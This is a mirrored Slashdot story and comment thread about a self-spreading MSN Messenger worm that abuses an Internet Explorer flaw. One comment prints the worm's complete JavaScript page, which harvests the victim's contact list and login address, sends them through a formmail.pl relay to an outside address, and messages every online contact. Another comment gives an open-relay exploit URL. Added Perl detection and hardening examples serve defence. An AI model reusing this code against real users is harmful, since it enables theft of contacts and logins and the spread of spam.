Slashdot Mirror


Microsoft Instant Messenger Virus Sweeps Net

Many people have reported a Warhol virus affecting users of Microsoft Instant Messenger. If you get messaged, "Go To http://www.masenko-media.net/cool.html NoW !!!", or any similar message (apparently there are several websites with the infection code), I suggest not following the link. A brief discussion follows.

Sequence: you get messaged "Go To http://www.masenko-media.net/cool.html NoW !!!" or something similar with another URL, and you follow the link. That webpage contains malicious code which reads your Messenger contact list and sends a similar message to each contact. It looks like it uses a vulnerability in formmail.pl as well, although I'm not exactly sure how (I'm not an expert in ECMAscript, sorry, and I have no systems that could possibly be affected by this to test with). I'm sure some of our readers can provide more information in the comments below.

There appear to be several webpages which carried the infected code, not just masenko-media.net. Some webmasters are already taking them down.

Sophistication: moderate. Damage: only your pride.

Solution: probably the latest mega-patch for Internet Explorer will fix the Microsoft bug that allowed this.

Risks: obviously, the code could have done worse than just messaging your contacts. With Microsoft making "messaging" an integrated part of the operating system, any flaws in it can be exploited to affect millions of people instantly, so it is a high-value target. Does it have commensurate high-strength security?


  1. Well, that's one less effectual site for vectoring by Second_Derivative · · Score: 5, Funny

    If the entire population of slashdot accessing that site to point and laugh at the exploit code and how it doesn't affect them doesn't constitute a slashdotting, I dunno what does =) I already can't access it.

    Someone post more links to the other vector pages, if we can't get them down any other way we'll bum-rush em ;)

  2. ToO mAnY cApS!!!11 by Anonymous Coward · · Score: 5, Funny

    iF yOuR fRiEnDs SeNd YoU mEsSaGeS fOrMaTtEd LiKe ThIs, YoU nEeD tO fInD nEw FrIeNdS!!!11

  3. Other clients? by Geeyzus · · Score: 5, Insightful

    I assume this only affects the MSN client from Microsoft... correct? Or does this also affect other clients that can use the MSN network, like Trillian? If it is just a link to some virus code on a website, it would affect Trillian (because it actually doesn't propagate through the instant messaging program)... but if it is something that gets triggered inside MSN Instant Messenger, then Trillian users are safe...

    Mark

    1. Re:Other clients? by Static_Neurotoxin · · Score: 5, Informative

      Trillian is safe. Opera is safe. The only combo you need to worry about is IE and Messenger.

      --
      --- If stupidity got us into this mess, why can it get us out?
  4. The Code by nihilist_1137 · · Score: 5, Informative

    Use Trillian: http://www.trillian.cc. A few people messaged me with the link. All that happens is that a blank window pops up. Mind you, I am on dual monitors so that may have had something to do with it. The code for the page (http://www.masenko-media.net/cool.html) is:
    <html>
    <head>
    <title>Welcome</title>
    <Script>

    var msnWin;
    var msnList;
    var msgStr = "Go To http://www.masenko-media.net/cool.html NoW !!!";

    function Go(){

    msnWin = document.open("res://mshtml.dll/blank.htm", "", "fullscreen=1");
    msnWin.resizeTo(1, 1);
    msnWin.moveTo(10000, 10000);
    msnWin.document.title = "Please Wait...";
    msnWin.document.body.innerHTML = '<object classid="clsid:F3A614DC-ABE0-11d2-A441-00C04F795683" id="msnObj1"></object><object classid="clsid:FB7199AB-79BF-11d2-8D94-0000F875C541" id="msnObj2"></object>';
    focus();

    if (msnWin.msnObj1.localState == 1){
    msnWin.msnObj2.autoLogon();
    }
    Contacts();
    Send();
    msnWin.close();
    document.contents.submit();
    }

    function Contacts(){
    msnList = msnWin.msnObj1.list(0);
    document.contents.email.value = msnWin.msnObj1.localLogonName;
    document.contents.subject.value = Date();
    var msnStr = "<br>";

    for (i=0;i<msnList.count;i++){
    if (msnList(i).state >1){
    msnStr += "Online Contact: " + msnList(i).FriendlyName + ", email: " + msnList(i).LogonName + "<br>";
    }

    else{
    msnStr += "Offline Contact: " + msnList(i).FriendlyName + ", email: " + msnList(i).LogonName + "<br>";
    }
    }
    document.contents.contentBox.value = msnStr;
    }

    function Send(){
    for (i=0;i<msnList.count; i++){
    if (msnList(i).state >1){
    msnList(i).sendText("MIME-Version: 1.0\r\nContent-Type: text/plain; charset=UTF-8\r\n\r\n", msgStr, 0);
    }
    }
    }

    </Script>
    </head>
    <body onload="Go()">
    <p align="center">&nbsp;
    <p align="center">&nbsp;</p>
    <p align="center">&nbsp;</p>
    <p align="center">&nbsp;</p>
    <p align="center"><font face="Arial">
    Please Wait...</font></p>
    <form METHOD="POST" ACTION="http://www.yong.f2s.com/mailform.pl" NAME="contents" ID="Form1">
    <input type="hidden" name="redirect" value="http://www.rjdesigns.co.uk/cool/go.htm" ID="Hidden1">
    <input type="hidden" name="recipient" value="mmargae@wanadoo.nl" ID="Hidden5">
    <input type="hidden" name="email">
    <input type="hidden" name="subject">
    <input type="hidden" NAME="contentBox" id="Hidden6">
    <input type=hidden name="env_report" value="REMOTE_HOST,HTTP_USER_AGENT">
    </form>
    </body>
    </html>

  5. could be a lot worse, likely will be soon by immanis · · Score: 5, Interesting

    I wrote a simple script about a year ago that exported a user's MSN registry key and sent it to me. Given that MSN logins, Passport Logins and Hotmail logins all could be gleaned from that key... well you get the idea.

    It worked too. Got to log into MSN as the CTO of our company, just to make a point.

    As long as scripters can manage things like this, and as long as it is _that_ easy to pull a person's login data from the registry, Passport will _never_ be secure.

  6. Not a Messenger flaw by Osty · · Score: 5, Informative

    First off, this is not a virus. It's an Internet Explorer exploit allowing access to your Messenger contact list and other Messenger functions. As the post noted, it is fixed with the latest IE patch. The actual problem was with IE's document.open scripting object, and how it was able to access local system objects from web sites (basically, the about: URI namespace was considered to be in the "My Computer" security domain, which means it had much more lax security than an actual website. However, since about: can take valid html, site developers were able to embed Messenger objects in about: pages, and access information from that). This is not a problem with Messenger at all.

    Install the patch and be done with it.
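    An added example, not code from the post or the thread: a Perl content-filter check for the indicator combination described above (a script-created res:/about: document that embeds the Messenger objects, plus the contact-list and send calls and the mail-relay form), run over two constructed HTML samples. The function and indicator names are assumptions made here; the class ids are the ones quoted elsewhere in the thread.

```perl
#!/usr/bin/perl
# Added example: indicator check for the page pattern described above.
use strict;
use warnings;

# Messenger ActiveX class ids quoted in the thread.
my @MESSENGER_CLSIDS = (
    'F3A614DC-ABE0-11d2-A441-00C04F795683',
    'FB7199AB-79BF-11d2-8D94-0000F875C541',
);

# Returns a hash ref of indicator => 1, plus a 'verdict' key.
sub scan_html {
    my ($html) = @_;
    my %hit;
    # 1. document/window.open() on a res: or about: URL, i.e. a page that
    #    creates a document IE placed in the My Computer zone.
    $hit{local_zone_document} = 1
        if $html =~ /\b(?:document|window)\.open\s*\(\s*["'](?:res:|about:)/i;
    # 2. <object classid="clsid:..."> naming a Messenger class id.
    for my $clsid (@MESSENGER_CLSIDS) {
        $hit{messenger_object} = 1
            if $html =~ /classid\s*=\s*["']?clsid:\Q$clsid\E/i;
    }
    # 3. Use of the object's contact list and send routine.
    $hit{contact_harvest} = 1 if $html =~ /\.(?:list\s*\(\s*0\s*\)|localLogonName\b)/;
    $hit{mass_send}       = 1 if $html =~ /\.sendText\s*\(/;
    # 4. A form posting to a mail CGI with a page-chosen recipient
    #    (the open-relay pattern discussed further down the thread).
    $hit{formmail_post} = 1
        if $html =~ /<form[^>]*action\s*=\s*["'][^"']*(?:form|mail)[^"']*\.pl["']/i
        && $html =~ /<input[^>]*name\s*=\s*["']?recipient\b/i;
    $hit{verdict} = ($hit{local_zone_document} && $hit{messenger_object})
        ? 'suspicious' : 'clean';
    return \%hit;
}

# Constructed samples (not the real page): indicator fragments, and an
# ordinary page with an unrelated <object>.
my $bad = <<'HTML';
<script>
var w = document.open("res://mshtml.dll/blank.htm", "", "fullscreen=1");
w.document.body.innerHTML = '<object classid="clsid:F3A614DC-ABE0-11d2-A441-00C04F795683" id="m1"></object>';
var l = w.m1.list(0); l(0).sendText("", "hi", 0);
</script>
<form method="POST" action="http://relay.example/mailform.pl" name="c">
<input type="hidden" name="recipient" value="someone@example.net">
</form>
HTML
my $good = <<'HTML';
<object classid="clsid:00000000-0000-0000-0000-000000000000"></object>
<form method="POST" action="/contact.php"><input name="email"></form>
HTML

for my $s ([bad => $bad], [good => $good]) {
    my ($name, $html) = @$s;
    my $r = scan_html($html);
    printf "%-4s %s: %s\n", $name, $r->{verdict},
        join(', ', sort { $a cmp $b } grep { $_ ne 'verdict' } keys %$r) || 'no indicators';
}
```

    The verdict only fires when the local-zone document trick and a Messenger object occur together, so a page that merely embeds the object in its own markup is not flagged by indicator 1.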

    1. Re:Not a Messenger flaw by RWarrior(fobw) · · Score: 5, Insightful

      "Install the patch and be done with it."

      Is that why I keep getting probed with NIMDA? Because people just install the patch and are done with it?

      --
      Remove the caps and hold to a mirror.
  7. interesting article on the reg by rogueuk · · Score: 5, Informative

    The Register had an article about this a few days ago. A flawed Document.Open() in the script apparently causes it. The demo site The Reg links to is pretty interesting. And of course, MS has known about this since December :-P

    1. Re:interesting article on the reg by sam_handelman · · Score: 5, Funny

      "this bug should not have been there" rants don't count as a solution

      You're artificially restricting the sphere of possible solutions to things that might help, which is intellectually honest. Shame on you.

      In ancient Sumeria, they used to execute architects when the buildings that they constructed collapsed. By the same token, we should kill some people.

      If we've learned one thing from the 20th century, it is that big government is inefficient. Therefore, the killings should be handled by the private sector.

      The proceedings against MS are criminal, in addition to civil. In a criminal proceeding, the judge is perfectly justified in issuing fatwas against MS programmers who write buggy code - this is a well established precept of Sharia.

      Thus, I've proven that the free market will take care of MS on its own, punishing it for buggy programming - through highly paid mercenary assassins, with EULAs to kill.

      I want to test and see if anyone reads their EULAs. Distribute a piece of software with an EULA that says, about halfway through-
      "By installing this software, you agree to take up arms in defense of (company name), march to the fastness of her foe, and slaughter her enemies. Please register the software so that we can give you your orders."

      --
      The good and new comes from no quarter where it is looked for, and is always something different from what is expected.
  8. Kinda funny.. by jfroot · · Score: 5, Funny

    I get this message from this girl I kind of like on MSN saying to go to this URL urgently. So I do (duh!). Turns out it is a porn site.. So I'm thinking what is this girl saying? Is she dropping some not so subtle hints? As I ponder this I get a MSN message from my mom asking me why I sent her a link to a porn site.. then I understood..

  9. Warhol? worm by blkros · · Score: 5, Informative

    The worm seems to be named because of a quote that the site attributes to Andy Warhol (i.e. 'in the future everyone will have his 15 minutes of fame'). That quote should actually be attributed to Marshall McLuhan, who Andy ripped it off from. So these worms should be named McLuhan worms.

    --
    Damnit, Jim, I'm an anarchist, not a F@#$!^& doctor!
  10. Finally! by digitalcowboy · · Score: 5, Funny

    I've been reluctant to use the MS IM client because it didn't appear they had fully integrated its virus abilities with all their other software. Now that it's part of a fully integrated Microsoft Virus Productivity Suite, I'm ready!

    Can anybody tell me where I can sign up for one of those Passport Universal Identifier and Cybercash Wallets and get the MS implant in my right hand or forehead?

  11. Re:No DNS Record? (Geeky Observations) by bovinewasteproduct · · Score: 5, Informative

    You might try just the domain name. Which comes out to:
    Registrant:
    Net Crater
    NetCrater
    502 Summit ST
    Walnut Cove, North Carolina 27052
    United States

    Registrar: Go Daddy Software (http://registrar.godaddy.com)
    Domain Name: MASENKO-MEDIA.NET
    Created on: 06-Feb-02
    Expires on: 06-Feb-03
    Last Updated on: 06-Feb-02
    Administrative Contact:
    Crater, Net domains@netcrater.com
    NetCrater
    502 Summit ST
    Walnut Cove, North Carolina 27052
    United States
    3365917696
    Technical Contact:
    Crater, Net domains@netcrater.com
    NetCrater
    502 Summit ST
    Walnut Cove, North Carolina 27052
    United States
    3365917696

    Domain servers in listed order:
    NS1.NETCRATER.COM
    NS2.NETCRATER.COM

    Looks fine to me..:)

    BWP

  12. One shoe drops by Anonymous Coward · · Score: 5, Interesting

    Well, this is one of a number of Damoclean swords hanging over the Net. A couple of other widely predicted "what if..?"s have already come to pass: Nimda was the first successful implementation of one, attacking through multiple vulnerabilities; others would include yesterday's SNMP freakout, the separate possibility of routing protocol attacks, yadda yadda, oh look... you all read bugtraq|incidents|nanog, et al., and know the score, and are presumably not very vulnerable. (Although one especially interesting aspect of this and other worms is that it defeats the security posture that says "take yourself out of the top 10% of easy sites to break into [by, eg., ONLY implementing the SANS top 10/20 fixes] and the kiddies will pass you by". If you're vulnerable, you WILL be hit. ) "But I haven't got anything worth taking, why would anyone want to crack me?" *sigh*...

    The thing that gets me is that NOTHING MAKES ANY DIFFERENCE. Web defacements - make no difference. ILoveYou - no effect. Melissa: nada, Nimda - plus ca change, plus ca la meme chose. Code Red? code schmed. The PHBs seem quite happy to just reformat, reinstall, count it as a cost of doing business on the net, and forget any lessons less stupid people might learn.

    Don't believe me? check out the IIS curve at Netcraft . What happened after Nimda and Code Red? IIS usage INCREASED.

    Mebbe I'm just bitter cos I've been trying to break into info-sec work for the last few years and getting nowhere cos I haven't an MCSE|CCNA|CISSP|security clearance, although I can usually spot half a dozen glaring holes in a setup within a few hours. (actually I interviewed at a "leading security firm" once & was given an automated test: I couldn't help noticing the machine I was given was logged in as NT Domain Admin. No, it wasn't a double-bluff test of my ethics!)

    Er... well, yes, I AM bitter; but that doesn't change the fact that there are an awful lot of clueless gimps out there managing (techs who manage) networks and network-connected systems.
    It seems to me that nothing short of a totally 100% evil malware that nukes HDs after silently & terminally corrupting backups for a few weeks will hit enough people where it counts - their wallets - to make any difference to the importance placed on info-sec in the vast majority of places.

    1. Re:One shoe drops by rjamestaylor · · Score: 5, Insightful

      > Don't believe me? check out the IIS curve at Netcraft. What happened after Nimda and Code Red? IIS usage INCREASED.

      IT purchasing decisions are made by people who are insulated from these problems but not from IT advertising. Ergo, this kind of problem has little to no effect on the IT market.

      --
      -- @rjamestaylor on Ello
  13. formmail.pl by TheFlu · · Score: 5, Informative

    Just an FYI about the lack of security on older versions of formmail.pl You should replace the exploitable version, if you are using it yourself.

    Formmail.pl Can Be Used As An Open Mail Relay

    Summary
    The CGI program Formmail.pl lacks adequate security checks and allows spammers to send anonymous e-mail using vulnerable host as mail relays.
    This vulnerability has already been exploited by spammers in many installations of Formmail.pl.

    Details
    Matt Wright's formmail.pl program does a "security check" on the HTTP_REFERER server variable. The security check is usually used to verify that information submitted from a form came from a proper or designated domain. This is usually done to prevent someone from creating a local, malicious form to submit to a script. This can be easily bypassed by passing a raw HTTP request, and faking the HTTP Referrer. This script also allows you to set the recipient's email address in the form. These two factors allow a malicious user to use the formmail.pl program to distribute their email (SPAM).

    Exploit:
    A URL such as the following:
    http://www.example.com/cgi-bin/FormMail.pl?recipient=email@address-to-spam.com&message=Proof%20that%20FormMail.pl%20can%20be%20used%20to%20send%20anonymous%20spam.

    Will send an anonymous e-mail if the installed FormMail.pl is vulnerable.

    Workaround:
    1. Remove your formmail.pl script until the author provides a fix.
    or:
    2. Hard code the recipient's email address in the formmail.pl program. Do not rely on the address submitted by the user.
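    As an added illustration of the advisory's two factors and of workaround 2 (this is not Matt Wright's script and not code from the post): a minimal Perl form-mailer decision routine in the weak form the advisory describes, beside a hardened form that fixes the recipient list in the script and stops treating the Referer as a trust decision. The function names, `parse_form`, and `webmaster@example.com` are assumptions made here; neither routine actually sends mail.

```perl
#!/usr/bin/perl
# Added example (not FormMail.pl): recipient handling of a form-to-mail CGI,
# weak form and hardened form.  Each returns (accept, recipient, reason).
use strict;
use warnings;

# Minimal application/x-www-form-urlencoded parser (no CGI.pm needed).
sub parse_form {
    my ($qs) = @_;
    my %f;
    for my $pair (split /&/, $qs // '') {
        my ($k, $v) = split /=/, $pair, 2;
        for ($k, $v) {
            next unless defined;
            tr/+/ /;
            s/%([0-9A-Fa-f]{2})/chr hex $1/ge;
        }
        $f{$k} = $v // '' if defined $k && length $k;
    }
    return \%f;
}

# WEAK: trusts a spoofable Referer header and lets the form choose the
# recipient, so anyone who crafts the request can relay through the host.
sub weak_formmail {
    my ($qs, $referer, @allowed_referers) = @_;
    my $f  = parse_form($qs);
    my $ok = grep { index($referer // '', $_) == 0 } @allowed_referers;
    return (0, undef, 'bad referer') unless $ok;
    return (0, undef, 'no recipient') unless defined $f->{recipient} && length $f->{recipient};
    return (1, $f->{recipient}, 'accepted');   # address came straight from the request
}

# HARDENED (workaround 2): recipients are fixed in the script; the form's
# "recipient" field can only select one of them, never supply a new one.
my @ALLOWED_RECIPIENTS = ('webmaster@example.com');   # hypothetical site address

sub hardened_formmail {
    my ($qs, $referer) = @_;   # $referer is accepted but never used as a trust decision
    my $f = parse_form($qs);
    my $wanted = $f->{recipient} // $ALLOWED_RECIPIENTS[0];
    my ($to) = grep { lc $_ eq lc $wanted } @ALLOWED_RECIPIENTS;
    return (0, undef, 'recipient not in fixed list') unless defined $to;
    return (0, undef, 'empty message') unless defined $f->{message} && $f->{message} =~ /\S/;
    return (1, $to, 'accepted');
}

# The request shape from the advisory, sent with a spoofed Referer.
my $spam_qs = 'recipient=email%40address-to-spam.com&message=Proof%20that%20FormMail.pl%20can%20be%20used';
my $spoofed = 'http://www.example.com/contact.html';
for my $impl ([weak => \&weak_formmail], [hardened => \&hardened_formmail]) {
    my ($name, $code) = @$impl;
    my ($accept, $to, $why) = $code->($spam_qs, $spoofed, 'http://www.example.com/');
    printf "%-8s accept=%d to=%s (%s)\n", $name, $accept, $to // '-', $why;
}
```

    The weak routine accepts the request and mails the attacker-chosen address; the hardened routine rejects it because the address is not in the script's own list, which is the property workaround 2 is after.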

  14. Sends mail too .. email address harvesting? by Wizard+of+OS · · Score: 5, Informative

    Look closely:

    <input type="hidden" name="recipient" value="mmargae@wanadoo.nl" ID="Hidden5">

    I think somebody forgot that HTML source can be viewed ...

    The nasty part: every time somebody looks at this page, his MSN-email address is being posted to this mailform.pl script (the web equivalent of an open relay) and it is sent to this wanadoo.nl user.

    --
    If code was hard to write, it should be hard to read
  15. Erlang Virus Propagation System by Anonymous Coward · · Score: 5, Interesting

    "A fully coordinated worm, where the worms explicitly coordinate their attack on the network, is a theoretical possibility but has not been seen in practice due to the difficulty in coding and coordinating the worms."

    Obviously the author has not heard of the interpreted, functional programming language Erlang. It can be best described as "The Borg" and has language level support for things like automatic resource discovery, live updates of software modules and distributed databases. There are binaries available for many architectures.

    An attack platform written in this language has the potential to be utterly devastating. Imagine, all of the infected nodes know about all of the other nodes. You have a distributed database containing information on exploits and probes for various computer systems that can be updated on the fly as new exploits are discovered. Even the code for the platform itself can be updated while the system is running.

    As I recall, there was a story on /. some time ago about the impossibility of removing viruses from a computer network without shutting the network down under certain conditions.

    Why hasn't this happened yet? It surely isn't for lack of expertise. No need to worry though, all the legislation that's been passed regarding computer crime prevents this sort of thing, right?!

  16. NOT a "Warhol Worm", just topologically aware by nweaver · · Score: 5, Informative

    Warhol style worms are purely active worms, which require no human intervention to spread. This worm sounds like an intervention-required worm/trojan (like a mailworm) but which spreads through MSN instead of email.

    It would be a warhol-like worm if the message sent automatically opened the web page, making it a purely autonomous worm. I sorta wish it was, because that would be an interesting validation of the speed of topologically aware active worms. Then again, I don't use MSN Messenger.

    For those who are interested, a more formal analysis is available Here, a paper I submitted to Usenix Security on the subject.

    --
    Test your net with Netalyzr
  17. People clicking on links... by Macrobat · · Score: 5, Funny

    True story:

    I just visited my friend's brother to pick up a used telescope. His brother's system is down because he clicked on a link in an email that said something like "pictures of me naked."

    When I told him that anything like that was obviously a worm or some kind of scam, he responded: "But it was from a girl who DOES send me pictures of herself naked!"

    Didn't know what to say to that.

    --
    "Hardly used" will not fetch you a better price for your brain.
    1. Re:People clicking on links... by roystgnr · · Score: 5, Funny

      Didn't know what to say to that.

      Well, duh. Two words:

      "Prove it!"

  18. Re:Gee... by Frater+219 · · Score: 5, Informative

    According to RISKS Digest, someone went along to watch a friend getting laser eye surgery & noticed (a) the technician was blindly hitting RETURN to clear pesky annoying error messages, and (b) the machine was running Win95. Oh, and this machine was taking the details of the subject's eye geometry, & controlling the laser that was about to shave a thin slice off the front of the eyeball to correct some minor astigmatism (IIRC; don't have the url to hand, anyone?)

    A quick Google search for "risks digest eye surgery" yields this link. Pretty frightening stuff, and it does show how well many users have become trained to treat error conditions as part of the normal behavior of computer operating systems and applications.

  19. Re:Know how to stop IE from launching MSN Msgr? by mech9t8 · · Score: 5, Informative

    You can delete the references to the Messenger object in the registry. It leaves Messenger unaffected but disables the web object.

    Remove the following registry keys:

    HKEY_CLASSES_ROOT\CLSID\{F3A614DC-ABE0-11d2-A441-00C04F795683}
    HKEY_CLASSES_ROOT\CLSID\{FB7199AB-79BF-11d2-8D94-0000F875C541}
    HKEY_CLASSES_ROOT\Messenger.MsgrObject

    and there's another Messenger.* object, but I forget what it was... but if you get the CLSIDs that should cover it...

    You can just rename them to backup_FB7199AB-79BF-11d2-8D94-0000F875C541 or whatever if you want to be cautious.

    You'll need to remove them again if you upgrade or reinstall - it'll put the references back.

    --
    Convictions are more dangerous enemies of truth than lies.
    - Nietzsche
  20. Duhhhh... Why not... by Shuh · · Score: 5, Funny

    Why not add a Javascript ticker-tape display to Slashdot so we can just watch the M$ virii/security-holes flash by like so many stock market reports?

  21. Re:CAPITALS ARE GOOD by amanb · · Score: 5, Funny

    > I hate my COBOL! course

    Is that the Yahoo! version of COBOL?